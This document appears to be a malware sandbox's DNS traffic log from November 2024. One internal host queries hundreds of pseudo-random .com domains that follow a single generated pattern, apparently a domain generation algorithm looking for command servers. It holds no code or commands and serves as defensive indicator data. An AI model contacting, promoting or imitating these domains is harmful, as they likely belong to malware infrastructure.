Nov 11, 2024 18:13:54.202828884 CET	192.168.2.6	1.1.1.1	0xac4a	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.203274012 CET	192.168.2.6	1.1.1.1	0x1ea	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.349356890 CET	192.168.2.6	1.1.1.1	0x427b	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.703922033 CET	192.168.2.6	1.1.1.1	0x57b5	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.725263119 CET	192.168.2.6	1.1.1.1	0x258a	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.726016998 CET	192.168.2.6	1.1.1.1	0x729e	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.726358891 CET	192.168.2.6	1.1.1.1	0x5072	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.726466894 CET	192.168.2.6	1.1.1.1	0x7fc4	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.263694048 CET	192.168.2.6	1.1.1.1	0x4a0c	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.302767992 CET	192.168.2.6	1.1.1.1	0x8fad	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.313999891 CET	192.168.2.6	1.1.1.1	0xf9f9	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.363590002 CET	192.168.2.6	1.1.1.1	0x2a2b	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.416745901 CET	192.168.2.6	1.1.1.1	0xcba9	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.646405935 CET	192.168.2.6	1.1.1.1	0xc27e	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.660568953 CET	192.168.2.6	1.1.1.1	0xb289	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.661365032 CET	192.168.2.6	1.1.1.1	0x5965	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.690542936 CET	192.168.2.6	1.1.1.1	0x84f1	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.787370920 CET	192.168.2.6	1.1.1.1	0xb5ac	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.857578993 CET	192.168.2.6	1.1.1.1	0xf2f0	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.857990026 CET	192.168.2.6	1.1.1.1	0x92a	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.858131886 CET	192.168.2.6	1.1.1.1	0x58b9	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.858974934 CET	192.168.2.6	1.1.1.1	0x6dd1	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:55.959685087 CET	192.168.2.6	1.1.1.1	0xaf88	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.049329996 CET	192.168.2.6	1.1.1.1	0xdc	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.336786032 CET	192.168.2.6	1.1.1.1	0xa5e7	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.411204100 CET	192.168.2.6	1.1.1.1	0x15c0	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.592657089 CET	192.168.2.6	1.1.1.1	0x3bbe	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.592657089 CET	192.168.2.6	1.1.1.1	0x180a	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.592959881 CET	192.168.2.6	1.1.1.1	0x3555	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.593172073 CET	192.168.2.6	1.1.1.1	0xd749	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:56.593512058 CET	192.168.2.6	1.1.1.1	0x2670	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.387499094 CET	192.168.2.6	1.1.1.1	0xe124	Standard query (0)	ganyvyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.484194994 CET	192.168.2.6	1.1.1.1	0x67ab	Standard query (0)	lykytin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.485918999 CET	192.168.2.6	1.1.1.1	0xe53d	Standard query (0)	qebyvyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.507083893 CET	192.168.2.6	1.1.1.1	0x5024	Standard query (0)	vopyjac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.507764101 CET	192.168.2.6	1.1.1.1	0xad71	Standard query (0)	lyvyver.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.653889894 CET	192.168.2.6	1.1.1.1	0xa2d1	Standard query (0)	pupyjap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.725497961 CET	192.168.2.6	1.1.1.1	0x5f9d	Standard query (0)	vojyrum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.807223082 CET	192.168.2.6	1.1.1.1	0xecd1	Standard query (0)	pujytug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:57.993000984 CET	192.168.2.6	1.1.1.1	0xda84	Standard query (0)	gatyhos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:59.624464035 CET	192.168.2.6	1.1.1.1	0xda2b	Standard query (0)	pumybuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.106010914 CET	192.168.2.6	1.1.1.1	0x6e33	Standard query (0)	pujyxoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.109219074 CET	192.168.2.6	1.1.1.1	0xf8f6	Standard query (0)	vojyzik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.110028028 CET	192.168.2.6	1.1.1.1	0xfdd1	Standard query (0)	qetyqag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.131160975 CET	192.168.2.6	1.1.1.1	0xbf71	Standard query (0)	qegylul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.134798050 CET	192.168.2.6	1.1.1.1	0xa81f	Standard query (0)	qeqyniq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.135440111 CET	192.168.2.6	1.1.1.1	0xce5f	Standard query (0)	puvydyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.138149977 CET	192.168.2.6	1.1.1.1	0xfe0c	Standard query (0)	lyvyfux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.139301062 CET	192.168.2.6	1.1.1.1	0xbce8	Standard query (0)	gatyqeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.143626928 CET	192.168.2.6	1.1.1.1	0x9157	Standard query (0)	gahyziw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.149887085 CET	192.168.2.6	1.1.1.1	0x3295	Standard query (0)	galycah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.150072098 CET	192.168.2.6	1.1.1.1	0xbf3c	Standard query (0)	pumygil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.151182890 CET	192.168.2.6	1.1.1.1	0x1973	Standard query (0)	lymygor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.152496099 CET	192.168.2.6	1.1.1.1	0x9d5e	Standard query (0)	volycem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.152973890 CET	192.168.2.6	1.1.1.1	0xc1f8	Standard query (0)	vocydyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.153093100 CET	192.168.2.6	1.1.1.1	0x4e0e	Standard query (0)	lyryman.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.155137062 CET	192.168.2.6	1.1.1.1	0x3383	Standard query (0)	vonygit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.174163103 CET	192.168.2.6	1.1.1.1	0x7cd9	Standard query (0)	vofykyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.175407887 CET	192.168.2.6	1.1.1.1	0x6757	Standard query (0)	qebyfup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.177094936 CET	192.168.2.6	1.1.1.1	0xfa04	Standard query (0)	vowymom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.177282095 CET	192.168.2.6	1.1.1.1	0xb8a5	Standard query (0)	lygylur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.177483082 CET	192.168.2.6	1.1.1.1	0xe035	Standard query (0)	lymynuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.177743912 CET	192.168.2.6	1.1.1.1	0xd49	Standard query (0)	gadykyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.177947998 CET	192.168.2.6	1.1.1.1	0x5a25	Standard query (0)	qedykep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.178205967 CET	192.168.2.6	1.1.1.1	0xce90	Standard query (0)	qedyruv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.178456068 CET	192.168.2.6	1.1.1.1	0x66d6	Standard query (0)	vowyjak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.178615093 CET	192.168.2.6	1.1.1.1	0xf525	Standard query (0)	gacyvub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.181927919 CET	192.168.2.6	1.1.1.1	0xefe4	Standard query (0)	lygytix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.184690952 CET	192.168.2.6	1.1.1.1	0xe9f	Standard query (0)	lykyxoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.185148001 CET	192.168.2.6	1.1.1.1	0x97b4	Standard query (0)	qexyvyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.185348034 CET	192.168.2.6	1.1.1.1	0xb2b0	Standard query (0)	qekyxaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.185745001 CET	192.168.2.6	1.1.1.1	0xe3a7	Standard query (0)	pupywyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.187144041 CET	192.168.2.6	1.1.1.1	0x830f	Standard query (0)	gacydes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.187525988 CET	192.168.2.6	1.1.1.1	0xe369	Standard query (0)	pufytip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.187737942 CET	192.168.2.6	1.1.1.1	0x5492	Standard query (0)	lyxyvyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.187999010 CET	192.168.2.6	1.1.1.1	0x8409	Standard query (0)	vofyruc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.188519955 CET	192.168.2.6	1.1.1.1	0x6665	Standard query (0)	qeqyhol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.190995932 CET	192.168.2.6	1.1.1.1	0x82b9	Standard query (0)	lysywyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.192178011 CET	192.168.2.6	1.1.1.1	0x4417	Standard query (0)	ganyfuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.192447901 CET	192.168.2.6	1.1.1.1	0xa6d7	Standard query (0)	pufylul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.192769051 CET	192.168.2.6	1.1.1.1	0x8019	Standard query (0)	lyxysad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.193283081 CET	192.168.2.6	1.1.1.1	0x60e1	Standard query (0)	vopyqef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.199012995 CET	192.168.2.6	1.1.1.1	0xc6af	Standard query (0)	qetyhov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.200150013 CET	192.168.2.6	1.1.1.1	0x6692	Standard query (0)	galypob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.200335979 CET	192.168.2.6	1.1.1.1	0xabcd	Standard query (0)	lysyjex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.201688051 CET	192.168.2.6	1.1.1.1	0x3db7	Standard query (0)	puzypav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.201850891 CET	192.168.2.6	1.1.1.1	0xe66f	Standard query (0)	vonybuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.202295065 CET	192.168.2.6	1.1.1.1	0x2c4e	Standard query (0)	volypof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.202891111 CET	192.168.2.6	1.1.1.1	0x2373	Standard query (0)	gaqyhaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.207715034 CET	192.168.2.6	1.1.1.1	0x1a0c	Standard query (0)	puzyceg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.208252907 CET	192.168.2.6	1.1.1.1	0xb5a8	Standard query (0)	gadyrus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.208803892 CET	192.168.2.6	1.1.1.1	0x2a4b	Standard query (0)	qekytig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.209033966 CET	192.168.2.6	1.1.1.1	0x191f	Standard query (0)	purymog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.209100962 CET	192.168.2.6	1.1.1.1	0x8559	Standard query (0)	gaqynih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.388649940 CET	192.168.2.6	1.1.1.1	0xf983	Standard query (0)	qexysev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.529186010 CET	192.168.2.6	1.1.1.1	0xcd39	Standard query (0)	puvycel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.529993057 CET	192.168.2.6	1.1.1.1	0xf9c4	Standard query (0)	lyxyxox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.536406040 CET	192.168.2.6	1.1.1.1	0xcb17	Standard query (0)	pufyweq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.536807060 CET	192.168.2.6	1.1.1.1	0x9102	Standard query (0)	qexyxop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.536961079 CET	192.168.2.6	1.1.1.1	0x6340	Standard query (0)	vowyguf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.537256002 CET	192.168.2.6	1.1.1.1	0x60df	Standard query (0)	gaqyfub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.537615061 CET	192.168.2.6	1.1.1.1	0xe485	Standard query (0)	lygywyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.538388968 CET	192.168.2.6	1.1.1.1	0x8669	Standard query (0)	puzyxip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.539943933 CET	192.168.2.6	1.1.1.1	0xff21	Standard query (0)	vopyguk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.542184114 CET	192.168.2.6	1.1.1.1	0x5d5a	Standard query (0)	lykywex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.543396950 CET	192.168.2.6	1.1.1.1	0x1176	Standard query (0)	qekyryp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.543874025 CET	192.168.2.6	1.1.1.1	0x1aa7	Standard query (0)	pupyguq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.546792984 CET	192.168.2.6	1.1.1.1	0x958	Standard query (0)	ganycob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.550021887 CET	192.168.2.6	1.1.1.1	0xaf0c	Standard query (0)	vonycaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.550240040 CET	192.168.2.6	1.1.1.1	0xb159	Standard query (0)	lysygij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.550463915 CET	192.168.2.6	1.1.1.1	0x4316	Standard query (0)	pumycav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.550649881 CET	192.168.2.6	1.1.1.1	0x260d	Standard query (0)	qedyhiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.554840088 CET	192.168.2.6	1.1.1.1	0x1bbf	Standard query (0)	puzytul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.559469938 CET	192.168.2.6	1.1.1.1	0xa49c	Standard query (0)	lymyved.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.565184116 CET	192.168.2.6	1.1.1.1	0x26a3	Standard query (0)	volyrut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.565979958 CET	192.168.2.6	1.1.1.1	0x69f4	Standard query (0)	gadyhoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.570353031 CET	192.168.2.6	1.1.1.1	0x5e29	Standard query (0)	galyryz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.578298092 CET	192.168.2.6	1.1.1.1	0x7fad	Standard query (0)	gahykeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.582061052 CET	192.168.2.6	1.1.1.1	0x2004	Standard query (0)	vojykyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.582256079 CET	192.168.2.6	1.1.1.1	0xe4dc	Standard query (0)	qebysaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.584709883 CET	192.168.2.6	1.1.1.1	0x184b	Standard query (0)	pupymol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.585167885 CET	192.168.2.6	1.1.1.1	0x357c	Standard query (0)	vonydem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.588975906 CET	192.168.2.6	1.1.1.1	0xe709	Standard query (0)	ganydeh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.589302063 CET	192.168.2.6	1.1.1.1	0x323f	Standard query (0)	lykylud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.589302063 CET	192.168.2.6	1.1.1.1	0x3a34	Standard query (0)	purybup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.626348019 CET	192.168.2.6	1.1.1.1	0xf07a	Standard query (0)	qexytil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.626981020 CET	192.168.2.6	1.1.1.1	0x6c7d	Standard query (0)	puvypoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.627137899 CET	192.168.2.6	1.1.1.1	0x1237	Standard query (0)	pujylyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.627351999 CET	192.168.2.6	1.1.1.1	0xeef2	Standard query (0)	lyvysaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.627439976 CET	192.168.2.6	1.1.1.1	0xcff5	Standard query (0)	lyrynux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.627602100 CET	192.168.2.6	1.1.1.1	0x88aa	Standard query (0)	qegykeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.632127047 CET	192.168.2.6	1.1.1.1	0xed94	Standard query (0)	vowybyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.632548094 CET	192.168.2.6	1.1.1.1	0x5bc7	Standard query (0)	lygyjan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.632797956 CET	192.168.2.6	1.1.1.1	0xeb4	Standard query (0)	gaqyvys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.632896900 CET	192.168.2.6	1.1.1.1	0xabf4	Standard query (0)	pufyjag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.632980108 CET	192.168.2.6	1.1.1.1	0x8e64	Standard query (0)	lyxytur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.633162022 CET	192.168.2.6	1.1.1.1	0x679b	Standard query (0)	qeqyvev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.633208036 CET	192.168.2.6	1.1.1.1	0x11c1	Standard query (0)	vofyjom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.633414030 CET	192.168.2.6	1.1.1.1	0xf7ef	Standard query (0)	lysymor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.633552074 CET	192.168.2.6	1.1.1.1	0xfde3	Standard query (0)	pumydyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.633670092 CET	192.168.2.6	1.1.1.1	0x4866	Standard query (0)	qedyqal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.633707047 CET	192.168.2.6	1.1.1.1	0x904e	Standard query (0)	galyzus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.633867979 CET	192.168.2.6	1.1.1.1	0x72b3	Standard query (0)	gacycaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.634033918 CET	192.168.2.6	1.1.1.1	0xc0d6	Standard query (0)	qegyryq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.634093046 CET	192.168.2.6	1.1.1.1	0x46f2	Standard query (0)	vopymit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.634284973 CET	192.168.2.6	1.1.1.1	0xbc2b	Standard query (0)	gacypiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.634329081 CET	192.168.2.6	1.1.1.1	0x9c10	Standard query (0)	qekyluv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.634485006 CET	192.168.2.6	1.1.1.1	0x20b2	Standard query (0)	gatyniz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.634948015 CET	192.168.2.6	1.1.1.1	0x8bb	Standard query (0)	vocypok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.635057926 CET	192.168.2.6	1.1.1.1	0xb3ca	Standard query (0)	qetynup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.638593912 CET	192.168.2.6	1.1.1.1	0x6e19	Standard query (0)	lyrygid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.639377117 CET	192.168.2.6	1.1.1.1	0xa2d2	Standard query (0)	vocycat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.639981985 CET	192.168.2.6	1.1.1.1	0xa405	Standard query (0)	gahyruh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.640515089 CET	192.168.2.6	1.1.1.1	0x5249	Standard query (0)	purygiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.686985016 CET	192.168.2.6	1.1.1.1	0x274d	Standard query (0)	gadyqaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.688565969 CET	192.168.2.6	1.1.1.1	0x6dd4	Standard query (0)	lymyfyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.693178892 CET	192.168.2.6	1.1.1.1	0x5210	Standard query (0)	volyzic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.693430901 CET	192.168.2.6	1.1.1.1	0x6d87	Standard query (0)	qeqyfug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.693830013 CET	192.168.2.6	1.1.1.1	0xb968	Standard query (0)	vofyqek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.789741993 CET	192.168.2.6	1.1.1.1	0x18c7	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.790185928 CET	192.168.2.6	1.1.1.1	0xe021	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.915404081 CET	192.168.2.6	1.1.1.1	0x267e	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.916722059 CET	192.168.2.6	1.1.1.1	0x44f	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.932902098 CET	192.168.2.6	1.1.1.1	0xee48	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.999866009 CET	192.168.2.6	1.1.1.1	0x9183	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.000544071 CET	192.168.2.6	1.1.1.1	0xf738	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.001142979 CET	192.168.2.6	1.1.1.1	0x358f	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.001619101 CET	192.168.2.6	1.1.1.1	0x4d3e	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.004625082 CET	192.168.2.6	1.1.1.1	0x4380	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.006161928 CET	192.168.2.6	1.1.1.1	0x7ca3	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.446196079 CET	192.168.2.6	1.1.1.1	0xf905	Standard query (0)	galyqoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.447060108 CET	192.168.2.6	1.1.1.1	0xad1c	Standard query (0)	vocyryf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.447773933 CET	192.168.2.6	1.1.1.1	0x9383	Standard query (0)	purycaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.448240995 CET	192.168.2.6	1.1.1.1	0x14cf	Standard query (0)	gacyryb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.666158915 CET	192.168.2.6	1.1.1.1	0x608a	Standard query (0)	lygygux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.799571037 CET	192.168.2.6	1.1.1.1	0xf645	Standard query (0)	vowycok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.803633928 CET	192.168.2.6	1.1.1.1	0x243f	Standard query (0)	qexyreg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.811359882 CET	192.168.2.6	1.1.1.1	0x42e7	Standard query (0)	pufygup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.811852932 CET	192.168.2.6	1.1.1.1	0x5106	Standard query (0)	gaqycow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.812227964 CET	192.168.2.6	1.1.1.1	0x7dc2	Standard query (0)	lyxywen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.812697887 CET	192.168.2.6	1.1.1.1	0x2e1a	Standard query (0)	vofyguc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.812959909 CET	192.168.2.6	1.1.1.1	0xaae4	Standard query (0)	qeqyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.813452959 CET	192.168.2.6	1.1.1.1	0x99e2	Standard query (0)	lymyxir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.813676119 CET	192.168.2.6	1.1.1.1	0xdcfa	Standard query (0)	puzywag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.814276934 CET	192.168.2.6	1.1.1.1	0x237f	Standard query (0)	gadyfys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.814768076 CET	192.168.2.6	1.1.1.1	0x549b	Standard query (0)	pumyxul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.815385103 CET	192.168.2.6	1.1.1.1	0x1257	Standard query (0)	lysyfed.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.815591097 CET	192.168.2.6	1.1.1.1	0xcd29	Standard query (0)	qedyfyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.908212900 CET	192.168.2.6	1.1.1.1	0x735c	Standard query (0)	pupybyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.909981966 CET	192.168.2.6	1.1.1.1	0x90d7	Standard query (0)	qekykal.com	A (IP address)	IN (0x0001)	false
